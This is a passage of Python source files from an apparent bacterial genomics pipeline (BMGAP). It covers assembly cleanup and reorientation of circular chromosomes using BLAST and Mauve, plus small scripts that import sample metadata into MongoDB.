query_basename = rename+'_WindowsQuery.fasta'
# re.sub('[^\w\s-]', '', value).strip().lower())
query_filename = os.path.join(temp_dir,query_basename)
with open(query_filename,'wt') as seq_out:
SeqIO.write(SearchWindows,seq_out,'fasta')
##Run BLAST
outfile = os.path.join(temp_dir,rename + '_' + os.path.basename(db_name))
##Note: may need to have "high stringency" and "low stringency" options. This is low stringency (for mapping to distant relatives). High stringency would increase perc_identity here and the qcovs filtering of "results"
blast_cline = NcbiblastnCommandline(query=shlex.quote(query_filename),db=shlex.quote(db_name),outfmt=_outfmt_str,out=shlex.quote(outfile),evalue=1E-100,perc_identity=80,qcov_hsp_perc=25,num_threads=2)
stdout = stderr = None
try:
stdout, stderr = blast_cline()
except Exception as e:
print("Blast failed on {} with {}...output below...".format(rename,reference_file))
print("\t{}".format(stdout))
print("\t{}".format(stderr))
print(e)
raise
results = pd.read_table(outfile,names=_outfmt_head)#No headers in file
results = results[results[bh['qcovs']] > 50].sort(bh['bitscore'],ascending=False) ##Should already be sorted by bitscore
full_start = full_end = 0 ##BLAST uses a 1 index
first_hit = None
coherent_fragments = 0
for w in SearchWindows:
window_hits = results[results[bh['qseqid']] == w.id]
if len(window_hits) > 0:
hit = window_hits.iloc[0]
start = hit[bh['sstart']]
end = hit[bh['send']]
contig = hit[bh['sseqid']]
forward = start < end
if first_hit is None: ##Serves as a sign that there was no prior hit
first_hit = hit
hit_contig = contig
full_start = start
full_end = end
full_forward = forward
else: ##Check that it is consistent with prior
in_order = (contig == hit_contig)
in_order &= full_forward == forward
in_order &= (full_end < start) == full_forward
in_order &= abs(end - full_end) < 2 * window
if in_order:
full_end = end
coherent_fragments += 1
else:
print("Warning: Contig {} is not in order. \nStopping".format(w.id))
break #For search windows
else:
print("Warning: Failed to find a match to fragment {}".format(w.id))
if coherent_fragments > 0:
print('Stopping since we have an anchor already')
break #For search windows
if coherent_fragments > 0:
print("Shifting contig {} ({} bp)".format(hit_contig,len(raw_contig_dict[hit_contig])))
new_contigs = shiftCirclarChromosome(raw_contig_dict[hit_contig],full_start,not full_forward,N_padding)
del raw_contig_dict[hit_contig]
for new_contig in new_contigs:
raw_contig_dict[new_contig.id] = new_contig
assert len(new_contig) != 0, 'Contig with length 0. Aborting. Contact developer'
print('Rotating contig: {}'.format(hit_contig))
print('Starting at {}'.format(full_start))
if full_forward:
print("keeping orientation")
else:
print("Reverse complement")
else:
print('Aborting: Failed to identify the start position based on the reference genome.')
print("\t Reorient contig by specifying args.circle_new_start and/or args.reverse_contig")
blast_results = outfile+'.tab'
print('\t Saving BLAST results at '+blast_results)
results.to_csv(blast_results,sep='\t')
return None
return [x for x in raw_contig_dict.values()]
def reorientContigs(raw_contigs,reference_file,working_dir,name=None,input_format=None):
utilities.safeMakeDir(working_dir)
mh = MauveHelper(True) ##looks in pre-defined location (mulitple versions)
if (mh.mauve_dir is None):
sys.exit("Cannot Find the Mauve path")
elif not os.path.isfile(mh.mauve_dir + mauve_jar):
sys.exit("Cannot Find the Mauve jar file. Searched on this path: "+mh.mauve_dir)
else:
if name is None:
name = 'noName'+time.strftime("%H%M%S")
temp_ext = 'fasta'
if input_format is None:
input_format = 'fasta'
elif input_format in ['gb','embl']:
input_format = 'gb'
temp_ext = 'gbk'
elif input_format != 'fasta':
print("Reorient contigs input format not recognized. Using raw FASTA.")
input_format = 'fasta'
assembly_file = os.path.join(working_dir,name+'_intermediate.'+temp_ext)
SeqIO.write(raw_contigs,assembly_file,input_format)
reorder_stats = mh.reorder_contigs(os.path.abspath(reference_file), assembly_file, working_dir)
return reorder_stats ##TODO: clean up this loop
# ##New_start is BLAST index (1, not 0)
# def reLigateCircularContig(contig,new_start,keep_forward):
# first_start = new_start - 1 if keep_forward else new_start ##Convert to 0 index; if reverse, then identify last base in final contig
# broken_contig = contig[first_start:] + contig[:first_start]
# assert len(broken_contig) == len(contig), 'Reorientation changes length. Oops!'
# final_contig = broken_contig if keep_forward else broken_contig.reverse_complement()
# final_contig.id = contig.id+'_Reorient'
# final_contig.name = contig.name+'_Reorient'
# final_contig.description = contig.description+'_Reorient'
# return final_contig
##This breaks the contig at the specified location, flips the new contgis if specified, and seals them back together if N_padding is specified
## Returns a list of contigs
def shiftCirclarChromosome(raw_contig,new_start,reverse_contig,N_padding=-1):
assert isinstance(raw_contig,SeqRecord.SeqRecord)
first_start = new_start - 1 if not reverse_contig else new_start ##Convert to 0 index; if reverse, then identify last base in final contig
if first_start in [0,len(raw_contig)]: ##Either hits first base 0 or last base in reverse direction (so index is last base + 1
broken_contigs = [raw_contig] ##don't break
if N_padding >= 0:
if N_padding == 0:
broken_contig = raw_contig[first_start:] + raw_contig[:first_start]
print("Joining fragments with no padding")
else:
print("N_padding not implementing. Exiting")
return None
broken_contig.id += '_Reorient'
broken_contig.name += '_Reorient'
broken_contig.description += '_Reorient'
broken_contigs = [broken_contig]
else:
broken_contigs = [raw_contig[first_start:],raw_contig[:first_start]]
print("Leaving fragments as separate contigs")
i = 0
for contig in broken_contigs:
addendum = '_Fragment_{}'.format(i)
contig.id += addendum
contig.name += addendum
contig.description += addendum
i += 1
# assert sum(broken_contigs) == len(contig), 'Reorientation changes length. Oops!'
final_contigs = []
if reverse_contig:
final_contigs = [c.reverse_complement(id=c.id, name=c.name+'_rc', description=c.description+' (reverse complement)') for c in reversed(broken_contigs)]
else:
final_contigs = broken_contigs
assert len(raw_contig) == sum(len(contig) for contig in final_contigs), "Final contig lengths do not match original length"
return final_contigs
##kwargs is passed to reorientation script (working_dir is primary concern right now)
def cleanupAndWrite(assembly_file,output_file,circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
length=None,coverage=None,report_file=None,reference=None,assembler=None,working_dir=None):
##Note: no sanity checks
## Load the assemblies
assembly_format,assembly_compressed = utilities.guessFileFormat(assembly_file)
output_format,output_compressed = utilities.guessFileFormat(output_file)
if assembly_format != output_format:
print("Warning on cleanup: input and output formats do not match ({} and {})".format(assembly_format,output_format))
with utilities.flexible_handle(assembly_file, assembly_compressed, 'rt') as fin:
seqs = [c for c in SeqIO.parse(fin,assembly_format)]
#Precise manipulation of single contig
updated_seqs = None
if circle_new_start or reverse_contig:
if len(seqs) > 1:
print("Error: User provided explicit reorientation instructions for a contig, but multiple contigs are present in assembly: \n"+assembly_file)
return 1
elif closed_circle:
print("Shifting closed circle...")
updated_seqs = shiftCirclarChromosome(seqs[0],circle_new_start,reverse_contig,N_padding=0)
elif broken_circle:
print("Shifting broken circle...")
updated_seqs = shiftCirclarChromosome(seqs[0],circle_new_start,reverse_contig,N_padding=-1)
elif circularize_with_Ns > 0:
print('Scaffolding not implemented')
else:
print('To shift a chromosome, you must specify whether the circle is closed or broken')
else: ## Complex criteria for manipulation
if closed_circle and len(seqs) > 1:
print("Warning: Untested parameters. User specified 'closed circle' but multiple contigs are present in assembly")
## Remove the low-quality contigs:
##TODO: consider if another parameter should be passed. At least specify if it came from SPAdes
circular = closed_circle or broken_circle##Circles imply high-quality sequence
if not circular:
if length is None:
length = 0
if coverage is None:
coverage = 0
if assembler is None:
print("Removing short contigs from assembly.")
updated_seqs = [x for x in seqs if len(x) > length]
# if coverage
elif assembler.upper()=='SPADES':
print("Removing low quality contigs from SPADES assembly. Length < {}; coverage < {}".format(length,coverage))
raw_filename = os.path.join(os.path.dirname(report_file),os.path.basename(assembly_file))
image_file = None # utilities.setExt(raw_filename, 'png') ##Note: this has been moved to the calculateStats routine
discard_file = utilities.appendToFilename(raw_filename, '_discarded') ##ext is same as assembly file
updated_seqs = cleanup_SPADES(seqs,minimum_length = length, minimum_coverage = coverage,export_contig_data=report_file,discard_file=discard_file,export_contig_graph=image_file)
else:
print("Error: assembler ({}) unknown for non-circular assembly. Not attempting to cleanup contigs in file: \n{}".format(assembler,assembly_file))
return 1
## Reorient to reference if requested
if reference:
input_seqs = updated_seqs if updated_seqs is not None else seqs
if os.path.isfile(reference):
if circular:
if len(input_seqs) > 1:
print('Warning: multiple contigs in "circular" assembly. Only one contig will be reoriented and I cannot tell you which one. Untested.')
if len(input_seqs) > 0:
N_padding = -1 ##Do not religate
if closed_circle:
N_padding=0
elif circularize_with_Ns > 0:
print('Scaffolding not implemented')
return 1
print("Reorienting circular chromosome to reference...")
updated_seqs = reorientClosedChromosome(input_seqs,reference,N_padding=N_padding,working_dir=working_dir) #Note: only treated as closed if N_padding >= 0
else: ## Len == 0
print("None of {} contigs passed your exclusion criteria. Exiting ".format(len(seqs)))
return 1
else:
if working_dir is None:
working_dir = os.path.splitext(output_file)[0]
draft_name = os.path.splitext(os.path.basename(assembly_file))[0]
print("Reorienting contigs")
reorder_stats = reorientContigs(input_seqs,reference,working_dir,name=draft_name,input_format=assembly_format) ##Will be genbank format
if isinstance(reorder_stats,dict) and ('ReorderedDraft' in reorder_stats):
updated_seqs = seq_utilities.seqs_guess_and_parse2list(reorder_stats['ReorderedDraft']) ##Excessive to reload... but it fits in this flow
else:
updated_seqs = None
else:
print("Unable to realign to reference because there is no refernce file: {}".format(reference))
if updated_seqs is None:
print("Unable to clean and orient the assembly: \n\t"+assembly_file)
return 1
else:
with open(output_file,'wt') as fout:
SeqIO.write(updated_seqs,fout,output_format)
print('Saved cleaned assembly at {}'.format(output_file))
if output_compressed:
print("Warning. Compression not implemented. The file extension is misleading")
return 0
def single(args):
assembly_file = args.assembly
if not os.path.isfile(assembly_file):
print("Exiting. Unable to find file {}".format(assembly_file))
return 1
# assembly_format,assembly_compressed = utilities.guessFileFormat(assembly_file)
if args.output:
output_file = args.output
output_dir = os.path.dirname(output_file)
else:
output_dir = utilities.safeMakeOutputFolder(_outputBase)
basename = utilities.appendToFilename(os.path.basename(assembly_file),'_RO')
output_file = os.path.join(output_dir,basename)
logFile = os.path.join(output_dir,"AssemblyCleanup.log")
sys.stdout = utilities.Logger(logFile)
print(_outputBase)
report_file = os.path.join(output_dir,os.path.basename(assembly_file)) + '.report.txt'
has_out = os.path.isfile(output_file)
has_rpt = os.path.isfile(report_file)
if has_out or has_rpt:
if args.force:
if has_out:
print("Removing prexisting file: {}".format(output_file))
os.remove(output_file)
if has_rpt:
print("Removing pre-existing file: {}".format(report_file))
os.remove(report_file)
else:
print("Exiting. Refusing to overwrite pre-existing output files: \n\t{}\n\t{}".format(output_file,report_file))
return 1
try:
open(output_file, 'a').close()
except IOError:
print("Exiting. Do not have permission to write to output file")
return 1
###########Should probably be a method
process = None
if args.reorient:
process = 'RO'
elif args.discard:
process = 'DIS'
elif args.discard_then_reorient:
process = 'DIS_RO'
else:
print("Exiting. No processing specified")
return(1)
expectedArgs = set(['working_dir','report_file'])
# circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
# length=250,coverage=10,report_file=None,reference=None,assembler=None
if 'RO' in process:
expectedArgs.update(RO_argset)
if 'DIS' in process:
expectedArgs.update(DIS_argset)
cleanup_args = vars(args)
cleanup_args = {k:v for k,v in cleanup_args.items() if k in expectedArgs}
return cleanupAndWrite(assembly_file,output_file,report_file=report_file,**cleanup_args)
## Load the assemblies
# with utilities.flexible_handle(assembly_file, assembly_compressed, 'rt') as fin:
# seqs = [c for c in SeqIO.parse(fin,assembly_format)]
#Precise manipulation of single contig
# cleaned = None
# if args.circle_new_start or args.reverse_contig:
# if len(seqs) > 1:
# print("Exiting: User provided explicit reorientation instructions for a contig, but multiple contigs are present in assembly")
# sys.exit(1)
# elif args.closed_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=0)
# elif args.broken_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=-1)
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# else:
# print('To shift a chromosome, you must specify whether the circle is closed or broken')
# else: ## Complex criteria for manipulation
# if args.closed_circle and len(seqs) > 1:
# print("Warning: Untested parameters. User specified 'closed circle' but multiple contigs are present in assembly")
#
# ## Remove the low-quality contigs:
# ##TODO: consider if another parameter should be passed. At least specify if it came from SPAdes
# circular = args.closed_circle or args.broken_circle##Circles imply high-quality sequence
# cleaned = seqs if circular else cleanup_SPADES(seqs,minimum_length = args.length, minimum_coverage = args.coverage,export_contig_data=report_file)
# ## Reorient to reference if requested
# if args.reference:
# if os.path.isfile(args.reference):
# if circular:
# assert len(seqs) <= 1, 'A multi-contig assembly cannot be a closed circle. This should have been caught prior to analysis'
# if len(seqs) == 1:
# N_padding = -1 ##Do not religate
# if args.closed_circle:
# N_padding=0
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# sys.exit(1)
# cleaned = reorientClosedChromosome(cleaned,args.reference,N_padding=N_padding)
# else: ## Len == 0
# print("No {} contigs passed your exclusion criteria. Exiting ".format(len(seqs)))
# sys.exit(1)
# else:
# ##TODO: dump to Mauve
# print("Have not yet implemented multi-contig reordering. Contact developer")
# pass
# else:
# print("Unable to realign to reference because there is no file: ".format(args.reference))
# if cleaned is not None:
# with open(output_file,'wt') as fout:
# SeqIO.write(cleaned,fout,'fasta')
# print('Saved reoriented assembly at '+output_file)
# return 0
# else:
# print("Unable to clean and orient the assembly")
# return(1)
req_fields = ['Filename','Gaps','Contig_Count']
def multiple(multi_args):
if multi_args.force and multi_args.resume:
print("Exiting: the options 'force' and 'resume' are incompatible. Use only 'force' if you want to overwrite prior files.")
return 1
output_dir = multi_args.output if multi_args.output else utilities.safeMakeOutputFolder(_outputBase)
utilities.safeMakeDir(output_dir)
logFile = os.path.join(output_dir,"AssemblyCleanup.log")
resultFile = os.path.join(output_dir,"AssemblyCleanupTable.tab")
tempFile = utilities.appendToFilename(resultFile, '_temp')
sys.stdout = utilities.Logger(logFile)
assembler_name = None if multi_args.assembler is None else multi_args.assembler.lower()
print("Parameters:")
for k,v in vars(multi_args).items():
print('{} : {}'.format(k,v))
draft_location = multi_args.draft_location
if os.path.isfile(draft_location):
guideFrame = pd.read_table(draft_location)
print('Loaded guide table from '+draft_location)
print("\t table contains {} records".format(len(guideFrame)))
elif os.path.isdir(draft_location):
print("Searching for files in "+os.path.abspath(draft_location))
deep_search = False if multi_args.shallow_search_assemblies else True
guideFrame = NGS_data_utilities.listGenomeFilesWithNames(draft_location,deep_search = deep_search,extension=multi_args.extension)
##Exclude reads
size_limit = multi_args.size_limit
if size_limit > 0:
guideFrame['filesize'] = guideFrame.Filename.apply(os.path.getsize)
small_enough = (guideFrame.filesize <= size_limit)
if sum(small_enough) < len(guideFrame):
print('Only {} of {} files pass the upper size limit of {}'.format(sum(small_enough),len(guideFrame),size_limit))
guideFrame = guideFrame[small_enough].copy()
guideFrame = guideFrame[NGS_data_utilities.dfHeaders].copy()
if guideFrame is None or (len(guideFrame) == 0):
print("Exiting. Failed to retrieve any files")
return 1
if assembler_name:
guideFrame['assembler'] = assembler_name
print('assigned assembler to be '+assembler_name)
else: #This is not passed to AssemblyStats
for i in guideFrame.index:
if 'spades' in guideFrame.loc[i,'Filename'].lower():
guideFrame.loc[i,'assembler'] = 'spades'
print('assigned assembler to be spades for {}'.format(guideFrame.loc[i,'Lab_ID']))
print('Calculating raw stats...')
assemblyStats = AssemblyStats.calculateStats(guideFrame.Filename.tolist(),ass_format=assembler_name,image_dir=output_dir)##This will independently infer assembler from name unless given
assemblyStats['Contig_Count'] = assemblyStats['Contig_Count'].astype(int)
if assemblyStats is None or len(assemblyStats) == 0:
print("Exiting failed to calculate assembly stats on input")
return 1
guideFrame = pd.merge(guideFrame,assemblyStats,how='left') ##Should merge on Filename. Don't want confusion if they share other fields
if multi_args.BCFB_PacBio_Name:
print('interpreting BCFB PacBio names...')
for i in guideFrame.index:
guideFrame.loc[i,'Gaps'] = False if '.ro1m.' in guideFrame.loc[i,'Filename'] else True
else:
guideFrame['Gaps'] = True ### Assume no closed genomes unless stated
else:
print("Exiting. Unable to find the location of draft files: {}".format(draft_location))
return(1)
print('Loaded data...')
process = None
if multi_args.reorient:
process = 'RO'
elif multi_args.discard:
process = 'DIS'
elif multi_args.discard_then_reorient:
process = 'DIS_RO'
else:
print("Exiting. No processing specified")
return(1)
expectedArgs = set(['working_dir','report_file','assembler'])
# circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
# length=250,coverage=10,report_file=None,reference=None,assembler=None
if 'RO' in process:
expectedArgs.update(RO_argset)
if not os.path.isfile(multi_args.reference):
print("Cannot find reference file. Exiting")
return 1
if 'DIS' in process:
expectedArgs.update(DIS_argset)
tag = multi_args.tag if multi_args.tag else process
print('Result files will have the tag "{}"'.format(tag))
##TODO test columns here
permitted_fields = req_fields + list(expectedArgs)
keep_fields = [x for x in guideFrame.columns if x in permitted_fields]
parameterFrame = guideFrame[keep_fields].copy()
if len(parameterFrame) == 0:
return 1 ##Failuer
fail_list = []
for i,row in parameterFrame.iterrows():##Row gets converted to keyword arguments; shares index with guideFrame
assembly_file = row['Filename']
if not os.path.isfile(assembly_file):
print("Error: unable to find file: {}".format(assembly_file))
output_file = 'error. '
else:
print("Working on "+os.path.basename(assembly_file))
print("\tat {}".format(time.ctime()))
del row['Filename']
if 'Contig_Count' in row.index:
if (str(row['Contig_Count']) == str(1)):
gaps = row['Gaps']
gap_bool = True ##Safest default (will introduce contig breaks). But should probably skip reorientation
if isinstance(gaps,str):
if gaps.upper() == 'TRUE':
gap_bool = True
elif gaps.upper() == 'FALSE':
gap_bool = False
else:
print("unable to interpret 'gaps' notation: {}".format(gaps))
continue
elif isinstance(gaps,bool):
gap_bool = gaps
else:
print("unable to interpret 'gaps' notation: {}".format(gaps))
continue
if gap_bool:
row['broken_circle'] = True ##NOTE: with our bacteria, we assume circle
else:
row['closed_circle'] = True
del row['Gaps']
assembly_basename = utilities.appendToFilename(os.path.basename(assembly_file),'_'+tag)
output_file = os.path.join(output_dir,assembly_basename)
report_file = os.path.join(output_dir,os.path.basename(assembly_file)) + '.report.txt'
has_out = os.path.isfile(output_file)
has_rpt = os.path.isfile(report_file)
if has_out or has_rpt:
if multi_args.force:
if has_out:
print("Removing prexisting file: {}".format(output_file))
os.remove(output_file)
if has_rpt:
print("Removing pre-existing file: {}".format(report_file))
os.remove(report_file)
else:
if not multi_args.resume:
print("Error: Refusing to overwrite pre-existing output files: \n\t{}\n\t{}".format(output_file,report_file))
continue
try:
open(output_file, 'a').close()
os.remove(output_file)
except IOError:
print("Error. Do not have permission to write to output file \n\t{}".format(output_file))
continue
cleanup_args = vars(multi_args).copy() ##TODO: put this up front?
cleanup_args.update(row.to_dict())
cleanup_args['working_dir'] = os.path.join(output_dir,'work')
cleanup_args = {k:v for k,v in cleanup_args.items() if k in expectedArgs}
if 'Mean_Coverage' in row.index:
proportion_cutoff = multi_args.coverage_proportion * row.loc['Mean_Coverage']
min_coverage = max(multi_args.coverage,proportion_cutoff)
cleanup_args['coverage'] = min_coverage
del cleanup_args['Mean_Coverage']
else:
cleanup_args['coverage'] = multi_args.coverage ##This should actually be irrelevant --
try:
print("Arguments:")
print(cleanup_args)
if cleanupAndWrite(assembly_file,output_file,report_file=report_file,**cleanup_args) != 0: ##TODO: return stats
output_file = 'error'
fail_list.append(assembly_file)
except Exception as e:
fail_list.append(assembly_file)
output_file = 'error'
warn="Exception on cleanupAndWrite:"
utilities.printExceptionDetails(e,warn)
print() ##Blank line
guideFrame.loc[i,'CleanedFile'] = output_file
guideFrame.to_csv(tempFile,index=False,sep='\t')
print("Errors on {} files: ".format(len(fail_list)))
print("\n\t".join(fail_list))
if process in ['DIS','DIS_RO']: ##recalculate stats for filtered contig sets
assemblyStats2 = AssemblyStats.calculateStats(guideFrame.CleanedFile.tolist(),ass_format=assembler_name)
if assemblyStats2 is not None:
# assemblyStats2.rename(columns={'Filename':'CleanedFile'},inplace=True)
guideFrame = AssemblyStats.BeforeAndAfter(guideFrame.set_index("CleanedFile"),assemblyStats2.set_index('Filename'))
# guideFrame = pd.merge(guideFrame,assemblyStats2,on='CleanedFile',suffixes=('_raw',''),how='outer')
print("Reporting stats for {} genomes.".format(len(guideFrame)))
guideFrame.fillna('N/A', inplace=True)
utilities.safeOverwriteTable(resultFile, guideFrame, 'tab',index=False)
return 0
# else:
# return 1 ##Absence of assembly stats frame indicates failure to generate files
# assembly_file,output_file,circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
# length=250,coverage=10,report_file=None,reference=None
#
# ## Load the assemblies
# assembly_format,assembly_compressed = utilities.guessFileFormat(assembly_file)
# with utilities.flexible_handle(assembly_file, assembly_compressed, 'rt') as fin:
# seqs = [c for c in SeqIO.parse(fin,assembly_format)]
# #Precise manipulation of single contig
# cleaned = None
# if args.circle_new_start or args.reverse_contig:
# if len(seqs) > 1:
# print("Exiting: User provided explicit reorientation instructions for a contig, but multiple contigs are present in assembly")
# sys.exit(1)
# elif args.closed_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=0)
# elif args.broken_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=-1)
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# else:
# print('To shift a chromosome, you must specify whether the circle is closed or broken')
# else: ## Complex criteria for manipulation
# if args.closed_circle and len(seqs) > 1:
# print("Warning: Untested parameters. User specified 'closed circle' but multiple contigs are present in assembly")
#
# ## Remove the low-quality contigs:
# ##TODO: consider if another parameter should be passed. At least specify if it came from SPAdes
# circular = args.closed_circle or args.broken_circle##Circles imply high-quality sequence
# cleaned = seqs if circular else cleanup_SPADES(seqs,minimum_length = args.length, minimum_coverage = args.coverage,export_contig_data=report_file)
# ## Reorient to reference if requested
# if args.reference:
# if os.path.isfile(args.reference):
# if circular:
# assert len(seqs) <= 1, 'A multi-contig assembly cannot be a closed circle. This should have been caught prior to analysis'
# if len(seqs) == 1:
# N_padding = -1 ##Do not religate
# if args.closed_circle:
# N_padding=0
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# sys.exit(1)
# cleaned = reorientClosedChromosome(cleaned,args.reference,N_padding=N_padding)
# else: ## Len == 0
# print("No {} contigs passed your exclusion criteria. Exiting ".format(len(seqs)))
# sys.exit(1)
# else:
# ##TODO: dump to Mauve
# print("Have not yet implemented multi-contig reordering. Contact developer")
# pass
# else:
# print("Unable to realign to reference because there is no file: ".format(args.reference))
# if cleaned is not None:
# with open(output_file,'wt') as fout:
# SeqIO.write(cleaned,fout,'fasta')
# print('Saved reoriented assembly at '+output_file)
# else:
# print("Unable to clean and orient the assembly")
# return(1)
import argparse
def main():
print("")
print("Running {} from {} at {}".format(SCRIPT_NAME,os.getcwd(),time.ctime()))
print("...script is found in {}\n".format(SCRIPT_DIR))
parser = argparse.ArgumentParser(description='A program to select and reorder decent contigs in genome assemblies (especially from SPADES).')
##Info
process_group = parser.add_argument_group(title='processes',description="Choose at least one process to apply to the genomes. Defaults to 'discard' behavior")
process_group.add_argument('--reorient',action='store_true',help="Reorient genomes according to a reference")
process_group.add_argument('--discard',action='store_true',help="Discard low value contigs (based on length and coverage)")
process_group.add_argument('--discard_then_reorient',action='store_true',help='First discard low value contigs, then reorient according to reference')
parser.add_argument('--force','-f',action='store_true',help='Force overwrite of output')
parser.add_argument('--version','-V',action='version',version='%(prog)s {}'.format(SCRIPT_VERSION))
parser.add_argument('--circularize_with_Ns',type=int,default=0,help='Assume that contigs are circular and add this many Ns to fill circle. Default is to leave contig broken')
parser.add_argument('--reference','-r',help="Reference genome for contig reordering")
parser.add_argument('--coverage','-c',help='Minimum coverage to keep contig (extracted from SPADES contig description) (will use maximum of coverage and coverage_proportion)',default=5,type=int)
parser.add_argument('--coverage_proportion','-p',type=float,help='Minimum coverage to to keep contig, as proportion of genome-wide mean. (will use maximum of coverage and coverage_proportion)',default=0)
parser.add_argument('--length','-l',help='Minimum length to keep contig',default=250,type=int)
parser.add_argument('--assembler','-a',help="Assembler used to produce contigs (e.g. SPADES). Provides description of read coverage for cleaning")
# parser.add_argument('--debug',action='store_true',help='Create a temporary repository in current directory')
subparsers = parser.add_subparsers(title='subcommands',
description='valid subcommands',
help='additional help')
single_ass = subparsers.add_parser('single')
single_ass.set_defaults(func=single)
single_ass.add_argument('assembly',help='assembly FASTA file to reorder')
single_ass.add_argument('--output','-o',help='File to write processed assembly. Default is '+_outputBase)
single_ass.add_argument('--closed_circle',action='store_true',help='The assembly is a closed, circular contig')
single_ass.add_argument('--broken_circle',action='store_true',help='The assembly in in a single contig, but was not closed')
single_ass.add_argument('--circle_new_start','-c',type=int,help='New start position for single circular contig in assembly file')
single_ass.add_argument('--reverse_contig',action='store_true',help='Reverse the single contig in assembly file')
multi_ass = subparsers.add_parser('multiple')
multi_ass.set_defaults(func=multiple)
multi_ass.add_argument('draft_location',help='Either a directory containing files to reorder or a table with required fields: {}'.format(', '.join(req_fields)))
multi_ass.add_argument('--output','-o',help='Directory to write processed assemblies. Default is '+_outputBase)
multi_ass.add_argument('--resume',action='store_true',help='Suppresses error messages when result files are found in output directory.')
multi_ass.add_argument('--tag','-t',help='Tag to append to filenames, indicating whether they have been reoriented (RO by default) or cleaned (CL) ')
multi_ass.add_argument('--shallow_search_assemblies',help='If drafts are in a folder, do not search subdirectories for assemblies',action='store_true')
multi_ass.add_argument('--BCFB_PacBio_Name',help='Files are named with BCFB PacBio conventions (".ro1m." means circularized)',action='store_true')
multi_ass.add_argument('--extension','-e',help='Limit search to files with this extension')
multi_ass.add_argument('--size_limit','-s',help='Limit on the size of files to analyze, in bytes (e.g. to exclude read data). Set to 0 to inactivate',default=25000000,type=int)
##TODO: option to break a contig to reorder?
### Check the import and export locations
args = parser.parse_args()
##Establish shared settings
##Run program
##Run the program
result = args.func(args)
if result != 0:
parser.print_usage()
if __name__ == "__main__":
if not utilities.has_preferred_python():
raise Exception("Upgrade your python version")
main()
```
#### File: BMGAP/pipeline/bmgap_metadata_importer.py
```python
import sys
import csv
import re
from pymongo import MongoClient
def main(args, db):
import_data = get_data_to_import(args[0])
print(import_data[0].keys())
for row in import_data:
import_the_data(row, db)
def import_the_data(data_to_import, db):
record = db.internal.find_one({"identifier": data_to_import["BMGAP_ID"]})
if record:
try:
does_match = re.search(data_to_import["Lab_Id"], record["Lab_ID"])
if does_match:
metadata_to_import = prepare_data_for_import(data_to_import)
db.internal.update_one(
{"identifier": data_to_import["BMGAP_ID"]},
{"$set": {"BML_Data": metadata_to_import}},
)
except:
print(data_to_import["BMGAP_ID"])
def prepare_data_for_import(data_to_import):
bml_metadata = {}
bml_metadata["country"] = (
data_to_import["Submitter_Country"]
if data_to_import["Submitter_Country"] != "NULL"
else ""
)
bml_metadata["state"] = (
data_to_import["Submitter_State"]
if data_to_import["Submitter_State"] != "NULL"
else ""
)
bml_metadata["year"] = (
data_to_import["Year_Collected"]
if data_to_import["Year_Collected"] != "NULL"
else ""
)
bml_metadata["sample_type"] = (
data_to_import["Source_of_Specimen"]
if data_to_import["Source_of_Specimen"] != "NULL"
else ""
)
bml_metadata["lab_st"] = (
data_to_import["CDC_SAST"] if data_to_import["CDC_SAST"] != "NULL" else ""
)
bml_metadata["lab_sg"] = (
data_to_import["CDC_SASG"] if data_to_import["CDC_SASG"] != "NULL" else ""
)
bml_metadata["nm_pcr"] = (
data_to_import["Nm_PCR_Results"]
if data_to_import["Nm_PCR_Results"] != "NULL"
else ""
)
bml_metadata["hi_pcr"] = (
data_to_import["Hi_PCR_Results"]
if data_to_import["Hi_PCR_Results"] != "NULL"
else ""
)
if bml_metadata["state"]:
bml_metadata["location"] = bml_metadata["state"]
elif bml_metadata["country"]:
bml_metadata["location"] = bml_metadata["country"]
return bml_metadata
def get_data_to_import(filename):
data_to_import = []
with open(filename, "r") as data_file:
reader = csv.DictReader(data_file)
for row in reader:
data_to_import += [row]
return data_to_import
if __name__ == "__main__":
if len(sys.argv) == 2:
mongo_server = "mongodb://bmgap-poc.biotech.cdc.gov"
else:
mongo_server = "mongodb://" + sys.argv[1]
client = MongoClient(
mongo_server, username="bmgap-writer", password="<PASSWORD>", authSource="BMGAP"
)
db_connection = client.BMGAP
main(sys.argv[2:], db_connection)
```
#### File: BMGAP/pipeline/insert_new_sample.py
```python
import re
import os
import argparse
from pymongo import MongoClient
def main(identifier, db_host, count, submitter, reads):
mongo_host = db_host
identifier = identifier
source_path = reads
fwd_read = get_fastq_file(source_path) if source_path else None
client = MongoClient(
mongo_host,
27017,
username="bmgap-writer",
password="<PASSWORD>",
authSource="BMGAP",
)
db = client.BMGAP
insert_statement = {
"identifier": identifier,
"count": count,
"Submitter": submitter,
}
if fwd_read:
insert_statement["fwdReadPath"] = os.path.join(source_path, fwd_read)
res = db.internal.insert_one(insert_statement)
print(res.inserted_id)
def get_fastq_file(path):
if (
re.search("instruments", path)
or re.search("bmgap-pipeline-testing", path)
or re.search("data/DTT", path)
):
# If the data comes from BML remove the sample subdirectory from the fastq path
fastq_path_raw = path.split("/")
fastq_path_parts = [x for x in fastq_path_raw if x != ""]
fastq_path = os.path.join(*fastq_path_parts[:-1])
contents = os.listdir(os.path.join("/" + fastq_path))
else:
contents = os.listdir(path)
for obj in contents:
if re.search(".*R1_001.fastq.gz", str(obj)):
return obj
return None
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Identifier
parser.add_argument("-i", "--identifier", action="store", required=True)
# Database
parser.add_argument("-d", "--db_host", action="store", required=True)
# Count
parser.add_argument("-c", "--count", action="store", required=False, default=1)
# Submitter
parser.add_argument(
"-s", "--submitter", action="store", required=False, default="BML"
)
# Path
parser.add_argument("-r", "--reads", action="store", required=False, default=None)
args = vars(parser.parse_args())
main(**args)
```
#### File: pipeline/locusextractor/AmpliconExtractor.py
```python
import os
import pandas as pd
import re
